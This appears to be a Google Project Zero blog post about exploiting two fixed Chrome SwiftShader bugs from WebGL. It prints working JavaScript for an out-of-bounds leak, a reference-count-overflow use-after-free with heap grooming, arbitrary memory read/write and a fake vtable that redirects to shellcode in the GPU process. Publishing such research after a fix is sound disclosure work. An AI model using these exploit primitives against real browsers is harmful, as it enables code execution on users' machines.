Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
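For example, on a Linux system (the binary name varies between platforms and release channels, so this invocation is illustrative):

google-chrome --disable-gpu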
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fall back to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
We previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read() is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation happens at the glTexImage2D call, and the out-of-bounds access during the blitFramebuffer call.)
function issue_1584(gl) {
  const src_width = 0x2000;
  const src_height = 0x16c4;

  // we use a texture for the source, since this will be allocated directly
  // when we call glTexImage2D.
  this.src_fb = gl.createFramebuffer();
  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

  let src_data = new Uint8Array(src_width * src_height * 4);
  for (var i = 0; i < src_data.length; ++i) {
    src_data[i] = 0x41;
  }

  let src_tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D, src_tex);
  // the 0xb620000-byte allocation happens here
  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
  gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);

  this.read = function() {
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

    const dst_width = 0x2000;
    const dst_height = 0x1fc4;

    let dst_fb = gl.createFramebuffer();
    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    let dst_rb = gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
    gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    // trigger the out-of-bounds access
    gl.blitFramebuffer(0, 0, src_width, src_height,
                       0, 0, dst_width, dst_height,
                       gl.COLOR_BUFFER_BIT, gl.NEAREST);

    // copy the out of bounds data back to javascript
    var leak_data = new Uint8Array(dst_width * 8);
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
    gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
    return leak_data.buffer;
  }
  return this;
}
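To give a sense of how this is driven, here is a minimal usage sketch (the context creation and use of new here are assumptions about the surrounding harness, not code from the exploit):

let canvas = document.createElement('canvas');
let gl = canvas.getContext('webgl2');

let leaker = new issue_1584(gl);
// returns an ArrayBuffer containing data read from directly beyond the
// 0xb620000-byte texture allocation in the GPU process
let oob_data = new Uint8Array(leaker.read());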
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
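To illustrate the idea, a hypothetical grooming sketch (the 128x128 texture size giving 0x10000-byte allocations, and the fill pattern, are illustrative choices, not taken from the exploit):

// pad the region directly following the large source texture with
// allocations whose contents we can recognise, so the out-of-bounds read
// lands in mapped, known memory.
function groom(gl, count) {
  let textures = [];
  for (let i = 0; i < count; ++i) {
    let tex = gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D, tex);
    // 128 * 128 * 4 bytes == 0x10000, matching the size of the leak
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, 128, 128, 0,
                  gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(128 * 128 * 4).fill(0x42));
    textures.push(tex);
  }
  // keep the references alive so nothing is freed underneath us
  return textures;
}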
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object, caused by a reference count overflow. This is quite a nice object from an exploitation perspective, since from javascript we can read and write the data it stores, so the nicest exploitation approach seems to be to replace this object with a corrupted version; however, as it’s a C++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
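The spray might look something like the following (a hypothetical reconstruction - the real leak_image lives in feng_shader.html and differs in its details):

// allocate many small renderbuffers, so that some of their backing
// egl::ImageImplementation objects (the 0xf0-byte C++ objects we want to
// inspect) land inside the 0x10000 bytes returned by the leak primitive.
function spray_images(gl, count) {
  let rbs = [];
  for (let i = 0; i < count; ++i) {
    let rb = gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER, rb);
    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, 1, 1);
    rbs.push(rb);
  }
  return rbs;
}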
So - a stock-take. We’ve just freed an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The uniform declarations in the vertex shader source will cause 4 allocations of size 0xf0 when the program object is linked; the copyTexImage2D call following the overflow loop is where the original object will be freed, and the linkProgram call after it replaces the allocation with a shader uniform object.
function issue_1585(gl, fake) {
  let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
  // each of the four 60-element uniform arrays will be backed by a
  // 0xf0-byte allocation when the program is linked.
  gl.shaderSource(vertex_shader, `
    attribute vec4 position;
    uniform int block0[60];
    uniform int block1[60];
    uniform int block2[60];
    uniform int block3[60];

    void main() {
      gl_Position = position;
      gl_Position.x += float(block0[0]);
      gl_Position.x += float(block1[0]);
      gl_Position.x += float(block2[0]);
      gl_Position.x += float(block3[0]);
    }`);
  gl.compileShader(vertex_shader);

  let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
  gl.shaderSource(fragment_shader, `
    void main() {
      gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
    }`);
  gl.compileShader(fragment_shader);

  this.program = gl.createProgram();
  gl.attachShader(this.program, vertex_shader);
  gl.attachShader(this.program, fragment_shader);

  const uaf_width = 8190;
  const uaf_height = 8190;

  this.fb = gl.createFramebuffer();
  let uaf_rb = gl.createRenderbuffer();

  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
  gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
  gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
  gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

  let tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);

  // trigger: each copy takes another reference on the egl::ImageImplementation
  // backing uaf_rb, eventually overflowing the 32-bit reference count.
  for (var i = 2; i < 0x10; ++i) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
  }

  function unroll(gl) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
    // snip ... (16 identical calls in total)
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
  }

  for (var i = 0x10; i < 0x100000000; i += 0x10) {
    unroll(gl);
  }

  // the reference count of the egl::ImageImplementation for the rendertarget
  // of uaf_rb is now 0, so this call will free it, leaving a dangling reference
  gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

  // replace the allocation with our shader uniform.
  gl.linkProgram(this.program);
  gl.useProgram(this.program);

  // busy-wait to give the asynchronous GPU command stream time to settle
  function wait(ms) {
    var start = Date.now(),
        now = start;
    while (now - start < ms) {
      now = Date.now();
    }
  }

  function read(uaf, index) {
    wait(200);
    var read_data = new Int32Array(60);
    for (var i = 0; i < 60; ++i) {
      read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
    }
    return read_data.buffer;
  }

  function write(uaf, index, buffer) {
    gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
    wait(200);
  }

  this.read = function() {
    return read(this, this.index);
  }

  this.write = function(buffer) {
    return write(this, this.index, buffer);
  }

  // write the fake object into all four uniform blocks, then read back to
  // find which one landed on the freed allocation.
  for (var i = 0; i < 4; ++i) {
    write(this, i, fake.buffer);
  }

  gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));

  for (var i = 0; i < 4; ++i) {
    var data = new DataView(read(this, i));
    for (var j = 0; j < 0xf0; ++j) {
      if (fake.getUint8(j) != data.getUint8(j)) {
        log('uaf block index is ' + i.toString());
        this.index = i;
        return this;
      }
    }
  }
}
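Putting the two issues together might then look roughly like this (hypothetical glue code; find_image_object is an illustrative helper standing in for the scanning logic in feng_shader.html):

let leaker = new issue_1584(gl);
let images = spray_images(gl, 0x1000);     // hypothetical spray, sketched above
let leaked = new DataView(leaker.read());
// scan the leaked bytes for something that looks like a sprayed object
let offset = find_image_object(leaked);    // hypothetical helper
let fake = new DataView(leaked.buffer.slice(offset, offset + 0xf0));
// uaf.read() and uaf.write() now alias the freed egl::ImageImplementation
let uaf = new issue_1585(gl, fake);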
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
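As a rough illustration of the idea (the field offset below is a placeholder; the real read_write function works from the layout of the leaked object copy):

// hypothetical sketch of an arbitrary read: repoint the fake image's
// backing-store pointer at the target address, then let readPixels copy
// from it.
const DATA_PTR_OFFSET = 0x28;  // placeholder, not the real offset
function set_ptr(view, offset, lo, hi) {
  view.setUint32(offset, lo, true);      // low 32 bits, little-endian
  view.setUint32(offset + 4, hi, true);  // high 32 bits
}
function read_memory(uaf, fake, addr_lo, addr_hi) {
  set_ptr(fake, DATA_PTR_OFFSET, addr_lo, addr_hi);
  uaf.write(fake.buffer);  // corrupt the dangling object
  // a following gl.readPixels (or gl.blitFramebuffer) against the stale
  // image now sources its pixels from the chosen address
}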
Now, it should be fairly trivial to get arbitrary code execution from this point; although it’s often a pain to get your ROP chain to line up nicely when you have to replace a C++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another C++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can craft our fake object so that our egl::ImageImplementation is instead treated as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can - so by creating a fake vtable such that:
egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
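Wiring that up might look along these lines (a sketch which assumes we have already recovered the relevant code addresses via the leak and know where our fake vtable will live; the slot and field offsets are placeholders):

// lay out the three vtable slots from the mapping above in memory we
// control, then point the fake object's vtable pointer at them.
set_ptr(vtable, 0x00, lock_lo, lock_hi);            // lockInternal -> lockInternal
set_ptr(vtable, 0x08, getentry_lo, getentry_hi);    // unlockInternal -> ELFMemoryStreamer::getEntry
set_ptr(vtable, 0x10, shellcode_lo, shellcode_hi);  // release -> shellcode
set_ptr(fake, 0x00, vtable_lo, vtable_hi);          // placeholder: vtable pointer at offset 0
uaf.write(fake.buffer);                             // publish the corrupted object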
Conclusions
It’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.